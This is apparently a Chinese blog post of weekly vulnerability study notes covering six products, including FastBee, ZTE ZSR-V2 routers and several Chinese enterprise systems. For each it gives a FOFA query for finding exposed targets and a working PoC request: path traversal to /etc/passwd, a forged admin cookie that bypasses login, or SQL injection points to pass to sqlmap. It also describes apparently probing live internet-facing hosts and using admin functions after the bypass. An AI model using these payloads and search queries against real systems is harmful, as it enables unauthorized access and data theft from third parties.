首页 > 其他分享 >9月第一周漏洞学习

9月第一周漏洞学习

时间:2024-09-08 21:26:20浏览次数:1  
标签:.. 第一周 xxx 学习 漏洞 fofa SQL 页面

蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞

漏洞描述

FastBee是一款开源物联网平台,致力于为全球开发者提供稳定、搞笑的物联网解决方案。FastBee在download接口中存在任意文件下载漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害

fofa语法

"fastbee"

POC

http://xxx.xxx.xxx.xxx/prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd

漏洞复现

fofa中搜索资产,共有724条数据匹配

image-20240908122031231

以下为登录页面以及页面特征

image-20240908122048818

构造payload发送数据包

image-20240908122321242

紫光电子档案管理系统selectFileRemote存在SQL注入漏洞

漏洞描述

紫光电子档案管理系统selectFileRemote存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏。

fofa语法

body="www.unissoft.com"

POC

POST /Archive/ErecordManage/selectFileRemote HTTP/1.1
Host: xxx.xxx.xxx.xxx
Accept: */* Accept-Encoding: gzip, deflate
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded

userID=admin&fondsid=1&comid=1'

漏洞复现

fofa中搜索资产,共有186条数据匹配

image-20240908122758891

以下为登录页面以及页面特征

image-20240908122821500

当前页面进行抓包,构造payload发送数据包

image-20240908122928664

对JSON数据中的每个参数进行测试,判断具体的注入点位置

在userID和fondsid处我使用单引号以及and 1=1为判断出来,返回状态码均为200

在comid处输入单引号报错

image-20240908123212354

初步判断此处可能存在SQL注入,接下来判断一下闭合方式,使用--+以及#都无法进行闭合,猜测存在过滤

使用and '1可以闭合

image-20240908123344736

到这就可以确认存在SQL注入漏洞了,然后就是把数据包放到sqlmap中进行测试

中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞

漏洞描述

中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞,该漏洞可能导致敏感信息泄露、数据盗窃以其他安全风险,从而对系统和用户造成严重危害。

fofa语法

title="ZSRV2路由器Web管理系统"

POC

GET /css/../../../../../../../../etc/passwd HTTP/1.1
Host: xxx.xxx.xxx.xxx

漏洞复现

fofa中搜索资产,共有123条数据匹配

image-20240908131546857

以下为登录页面以及页面特征

image-20240908131603719

当前页面抓包,构造payload

image-20240908131634143

无法直接访问http://xxx.xxx.xxx.xxx/css/../../../../../../etc/passwd,会提示404 not found

珠海新华通软件股份有限公司云平台存在登录绕过漏洞

漏洞描述

珠海新华通软件股份有限公司云平台存在登录绕过漏洞,漏洞允许攻击者通过简单操作,如添加特定Cookie或修改请求参数,绕过身份验证直接访问后台,从而对系统安全构成严重威胁。

fofa语法

icon_hash="513304261"

POC

POST /Main/Desktop/Default.aspx HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 166
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: ASP.NET_SessionId=x01ftldfm5dwbbo1tx1ne1kv; #_SSO_Login_UserID=admin; #_SSO_Login_UserID_Guid=
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest

在浏览器中请求/Main/Desktop/Default.aspx,添加cookie为#_SSO_Login_UserID=admin,即可绕过登录进入后台

漏洞复现

在fofa中搜索资产,共有50条数据匹配

image-20240908133914350

以下为登录页面以及页面特征

image-20240908133942983

访问http://xxx.xxx.xxx.xxx/Main/Desktop/Default.aspx,然后添加cookie认证

image-20240908134022741

发送后即可绕过登录

image-20240908134104482

尝试点击了一些功能点后,可正常使用管理员权限

和达科技智慧水务综合管理系统UCCGSrv.asmx存在SQL注入漏洞

漏洞描述

和达科技智慧水务综合管理系统UCCGSrv.asmx存在SQL注入漏洞,攻击者可以通过该漏洞获取数据库中的敏感信息,甚至在高权限的情况下进一步获取服务器系统权限。

fofa语法

body="skins/login/images/btn_login.jpg"

POC

POST /DataSrvs/UCCGSrv.asmx/GetMenuItem HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cookie: #_SSO_Login_UserID=admin
Priority: u=0, i

name=*

漏洞复现

fofa中搜索资产,共有39条数据匹配

image-20240908140127683

以下为登录页面以及页面特征

image-20240908140200720

访问http://xxx.xxx.xxx.xxx/DataSrvs/UCCGSrv.asmx/GetMenultem,会提示缺少name参数

image-20240908140253363

当前页面抓包,修改请求方式为POST,添加name参数

image-20240908140456196

在name参数后面添加单引号查看报错

image-20240908140530349

出现报错,初步判断可能存在SQL注入,然后就是判断闭合方式了

image-20240908140711937

好了,现在可以确定是存在SQL注入漏洞了,把数据包放入到sqlmap中进行再次确认

image-20240908141434016

东胜物流软件SubCompSeaeDefAdapter存在SQL注入漏洞

漏洞描述

东胜物流软件的SubCompSeaeDefAdapter接口存在SQL注入漏洞,远程攻击者可以利用该漏洞获取数据库中的敏感信息,甚至在高权限的情况下,进一步获取服务器系统权限。

fofa语法

body="CompanysAdapter.aspx"

POC

https://xxx.xxx.xxx.xxx/FeeCodes/SubCompSeaeDefAdapter.aspx?CORPID=1*

漏洞复现

fofa中搜索资产,共有1319条数据匹配

image-20240908144650777

以下为登录页面以及页面特征

image-20240908144705692

访问https://xxx.xxx.xxx.xxx/FeeCodes/SubCompSeaeDefAdapter.aspx?CORPID=1

先确认是否存在SQL注入,在CORPID=1后面拼接单引号或者and 1=1判断注入类型

image-20240908144830691

从报错信息来看需要拼接单引号和小括号,然后进行闭合

image-20240908144921837

已经确认存在SQL注入漏洞了,接下来将URL放入到sqlmap中进行再次确认

image-20240908145825625

标签:..,第一周,xxx,学习,漏洞,fofa,SQL,页面
From: https://www.cnblogs.com/LeouMaster/p/18403506

相关文章

  • 信息安全学习day3
    Day3Linux文件与目录管理2024年9月2日14:14Linux文件与目录管理01命令格式Rm 命令  -rf选项   /*参数(命令不可以省略,选项参数可以缺省规范1.必须有命令2.命令选项参数之间要有空格3.命令区分大小写4.顺序(大部分情况顺序不影响)命令选项详细资料Linu......
  • JavaWeb学习笔记,关于HTML的入门标签及属性
    一.HTML入门结构标签以及特点   以上标签即为HTML的入门标签,包括了HTML的基本框架结构标签以及部分常用标签,需要注意的是,HTML的语法松散,但我们更要严格要求自己,使用正常符合要求的代码格式,以免后期出现错误而无法及时发现问题,值得提起的还有,<h1>到<h6>是HTML中预定义好......
  • 学习makefile(2)
    1、Makefile规则 HelloWorld基本上所有程序员的所有编程语言一个最简单的例子,虽然makefile不是一门编程语言,但是我们同样可以在一个命令中终端上输出一个helloworldall:echo"HelloWorld"那上述例子中就有我们学习的第一个语法,echo前面必须只有TAB,且至少有一个TAB,不......
  • FZU软件工程课程学习过程中的自我评估以及软件工程学习指南
    这个作业属于哪个课程https://edu.cnblogs.com/campus/fzu/SE2024这个作业要求在哪里https://edu.cnblogs.com/campus/fzu/SE2024/homework/13243这个作业的目标初步了解博客园和github的使用,体会AIGC在辅助完成任务上的效率和便捷,理解程序与程序员在AI时代的关系......
  • Hadoop学习总结
    在深入学习Hadoop的过程中,我逐渐探索了其高级特性和性能优化的技巧,发现这些方法对提升数据处理的效率和集群的稳定性至关重要。Hadoop,作为一个强大的大数据处理框架,其核心组件包括HDFS(分布式文件系统)和YARN(YetAnotherResourceNegotiator)。在掌握了基本的使用方法后,我开始关注如......
  • 学习之路(二)
    今天是24.9.8已经开学两周了继续写流水账:暑假确实和上一篇说的一样只回家呆了几天,一直留在学校这边做小项目。这次做的项目和之前的练手不同了,因为一周前真的上线应用了,上线当天就突破1k用户(当然依靠的是老师在迎新时的推广)。现在回过头来看,练手的项目和需要上线的项目真......
  • 《动手学深度学习》笔记3——矩阵求导
    李沐老师的讲解思路是先从数学概念引入,讲完以后再到代码实现:1.数学概念1.1标量导数1.2向量求导(梯度)分为四种情况:1.2.1标量y,关于向量x求导李沐老师这里先讲了y为标量,x为向量的情况,x是长度为1的列向量,关于列向量的导数(即梯度)是行向量,具体解释如下:在这个例子里, ......
  • 《动手学深度学习》笔记4——线性回归 + 基础优化算法
    李沐老师:线性回归是机器学习最基础的一个模型,也是我们理解之后所有深度学习模型的基础,所以我们从线性回归开始1.线性回归由于是案例引入,没有很难的知识点,咱直接贴上李沐老师的PPT:1.1线性模型--单层神经网络李沐老师:神经网络起源于神经科学,但现在深度学习的发展......
  • 20221402-信息安全设计第一周预习报告
    第一周预习报告学习内容第一章概念复习我在微信读书上简单阅读了《WindowsC/C++加密解密实战》第1、2章,并且借助了微信读书的AI大纲功能了解了每一章节的核心内容第一章第一章里主要介绍了密码学简史和一些最基本的密码常识,像五元组和算法分类我都在上学期的信息安全概论、......
  • discuz3.4文件包含漏洞
    首先查看修复:可以看到新增代码preg_match("/^[\w-]+\.php$/i",$parse['path']))来验证path是否为php文件,这个应该是修复路径遍历导致的文件读取漏洞。还有require'./'.$_ENV['curapp'].'.php';这里应该是另外一个漏洞,因为$parse['path']和$_ENV['curapp'......